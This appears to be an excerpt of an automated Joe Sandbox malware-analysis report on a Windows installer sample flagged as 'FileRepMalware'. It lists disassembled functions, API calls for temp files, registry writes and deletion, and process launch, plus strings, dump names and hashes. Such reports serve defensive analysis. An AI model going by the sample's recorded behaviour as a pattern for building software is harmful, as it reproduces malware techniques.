                                                                            control_flow_graph 714 405d6d-405d79 715 405d7a-405dae GetTickCount GetTempFileNameW 714->715 716 405db0-405db2 715->716 717 405dbd-405dbf 715->717 716->715 718 405db4 716->718 719 405db7-405dba 717->719 718->719
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405D8B
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589), ref: 00405DA6
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 00405D6D
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D72, 00405D76
                                                                            • nsa, xrefs: 00405D7A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-758867437
                                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                                            Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 720 401c19-401c39 call 402c15 * 2 725 401c45-401c49 720->725 726 401c3b-401c42 call 402c37 720->726 728 401c55-401c5b 725->728 729 401c4b-401c52 call 402c37 725->729 726->725 732 401ca9-401cd3 call 402c37 * 2 FindWindowExW 728->732 733 401c5d-401c79 call 402c15 * 2 728->733 729->728 745 401cd9 732->745 743 401c99-401ca7 SendMessageW 733->743 744 401c7b-401c97 SendMessageTimeoutW 733->744 743->745 746 401cdc-401cdf 744->746 745->746 747 401ce5 746->747 748 402abf-402ace 746->748 747->748
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                            • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                            • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                            • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                                            Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 751 4023de-40240f call 402c37 * 2 call 402cc7 758 402415-40241f 751->758 759 402abf-402ace 751->759 760 402421-40242e call 402c37 lstrlenW 758->760 761 402432-402435 758->761 760->761 764 402437-402448 call 402c15 761->764 765 402449-40244c 761->765 764->765 769 40245d-402471 RegSetValueExW 765->769 770 40244e-402458 call 4030fa 765->770 773 402473 769->773 774 402476-402557 RegCloseKey 769->774 770->769 773->774 774->759 776 402885-40288c 774->776 776->759
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\investeringsbelbenes\redocking.gal,00000023,00000011,00000002), ref: 00402429
                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402469
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402551
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID: C:\Users\user\investeringsbelbenes\redocking.gal
                                                                            • API String ID: 2655323295-2247975457
                                                                            • Opcode ID: 1b07b6a4042edac88e30191eb04ec3400c301296b1d9730ad93332bf0913e8ea
                                                                            • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                                                            • Opcode Fuzzy Hash: 1b07b6a4042edac88e30191eb04ec3400c301296b1d9730ad93332bf0913e8ea
                                                                            • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                                                            Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 777 402d2a-402d53 call 4060b9 779 402d58-402d5a 777->779 780 402dd0-402dd4 779->780 781 402d5c-402d62 779->781 782 402d7e-402d93 RegEnumKeyW 781->782 783 402d64-402d66 782->783 784 402d95-402da7 RegCloseKey call 406626 782->784 785 402db6-402dc2 RegCloseKey 783->785 786 402d68-402d7c call 402d2a 783->786 791 402dc4-402dca RegDeleteKeyW 784->791 792 402da9-402db4 784->792 785->780 786->782 786->784 791->780 792->780
                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Close$Enum
                                                                            • String ID:
                                                                            • API String ID: 464197530-0
                                                                            • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                            • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                                            • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                            • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00405BC8: CharNextW.USER32(?,?,00425EF0,?,00405C3C,00425EF0,00425EF0,?,?,774D3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405BD6
                                                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 0040577F: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer,?,00000000,000000F0), ref: 0040164D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer, xrefs: 00401640
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer
                                                                            • API String ID: 1892508949-1185868749
                                                                            • Opcode ID: 75e7e4fe9cd94636c6f05202438b7b487f2e50f68e3bc8c7472ee2e9d131d518
                                                                            • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                                            • Opcode Fuzzy Hash: 75e7e4fe9cd94636c6f05202438b7b487f2e50f68e3bc8c7472ee2e9d131d518
                                                                            • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                                            Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,0040638E,80000002), ref: 00406160
                                                                            • RegCloseKey.ADVAPI32(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,fusionsenergiens), ref: 0040616B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: : Completed
                                                                            • API String ID: 3356406503-2954849223
                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                            • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                            • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                                            Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                            • CloseHandle.KERNEL32(?), ref: 00405867
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00405844
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                            • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                            • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                            • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                                            Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                            • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                            • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                            • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                            Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                            • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                            • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                            • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                            Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                            • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                            • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                            • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                            Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                            • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                            • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                            • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                            Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
